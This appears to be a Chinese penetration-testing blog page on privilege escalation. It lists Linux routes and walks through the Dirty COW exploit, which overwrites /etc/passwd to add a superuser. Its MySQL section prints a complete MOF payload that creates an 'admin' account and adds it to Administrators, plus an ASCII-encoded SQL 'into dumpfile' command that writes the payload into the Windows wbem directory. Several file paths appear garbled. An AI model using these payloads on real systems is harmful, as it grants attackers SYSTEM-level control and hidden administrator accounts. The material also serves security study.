提权

Web渗透测试
  1. 提权
    1. 一、Linux常见提权
    2. 二、Mysql提权
      1. 1、MOF文件提权
      2. 2、udf提权

提权

一、Linux常见提权

黑白之道—红队测试之Linux提权小结:https://mp.weixin.qq.com/s/BOCQoZLK_IXKXIqzFA4yFA

  1. 内核漏洞

  2. 定时任务

  3. Suid文件

  4. Sudo 配置错误

  5. NFS共享

  6. 第三方服务

1、Linux内核提权漏洞—“脏牛”

辅助工具:https://github.com/mzet-/linux-exploit-suggester

1
2
3
4
5
6
1、小可怜 nc -l 2333 > 获得脚本.py
2、攻击人 nc 小可怜IP 2333 < 送过去脚本.py
3、小可怜运行脚本,发现了有脏牛漏洞[CVE-2016-5195] dirtycow
4、searchsploit dirty Cow     #通过攻击人的exploit-db数据库搜索并获得脏牛漏洞exp
5、用nc的方式传过去
6、小可怜编译运行,让你输入一个密码,成功篡改了/etc/passwd,在其中增加了firefart超级用户,并备份了原来的/etc/passwd.bak,并且脚本提示在工作完毕请mv /etc/passwd.bak /etc/passwd 恢复现场。

2、定时任务

pspy监听进程辅助工具:https://github.com/DominicBreuker/pspy

3、Suid提权

LinEnum.py:https://github.com/rebootuser/LinEnum

二、Mysql提权

1、MOF文件提权

​ mof是Windows系统的一个文件,位于c:windows\system32\wbem\mofnullevt.mof,叫做托管对象格式, 它的作用是每隔5秒,就会去监控进程的创建和死亡。mof提权的简单利用过程就是,拥有了MySQL的root权限 后,使用root权限去执行上传操作,将我们重新改写过的mof文件上传,之后,这个文件会被服务器每隔5秒 以system权限执行。这个改写的mof中,有一段是vbs脚本,这个vbs大多数是cmd的添加管理员用户的命令

​ 可以提权的根本原因是因为有一个更高权限的线程执行了命令。我们这里nullevt.mof文件的加载过程由system 用户执行,因此我们可以最高把用户的权限提升到system。

利用条件

  • Windows版本<=2003
  • c:windowssystem32wbemmof目录可写入
  • 数据库允许外连,且已知root账号密码

利用代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# pragma namespace("\.rootsubscription")

instance of **EventFilter as $EventFilter{    EventNamespace = "RootCimv2";    Name  = "filtP2";    Query = "Select * From **InstanceModificationEvent "
            "Where TargetInstance Isa "Win32_LocalTime" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user admin admin /add")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

其中的关键就在于第14行的“net.exe user admin admin /add”,这句是用来创建一个用户名为admin,密码为admin的用户,创建成功后,再将这句命令改为 “net.exe localgroup administrators admin /add”后,再次上传,达到创建admin用户并将其加入administrators组的目的。

利用过程

0x0、拥有网站webshell时

如果已经得到了该网站的webshell,那么可以将nullevt.mof文件上传到c盘的的可写目录xxx,然后执行下面的SQL命令即可

select load_file(‘c:xxxnullevt.mof’) into dumpfile ’c:\\windows\system32\wbem\mofnullevt.mof’;

这里可以看下dumpfile与outfile的区别,对于outfile来说,into outfile会自动添加换行符等操作,适用于文本文件,不适合于代码。因为会产生冗余数据,会导致我们的命令执行 失败。而into dumpfile是将文件以二进制的方式写入,因此这里我们用into dumpfile。

0x1、未拥有网站webshell时

对于没有网站webshell的情况,我们可以采取连接数据库后直接写入的方式,将代码转换为ASCII码后,直接传入。

1
select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:windowssystem32wbemmofnullevt.mof';

2、udf提权

优秀博客:https://www.cnblogs.com/litlife/p/9030673.html

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器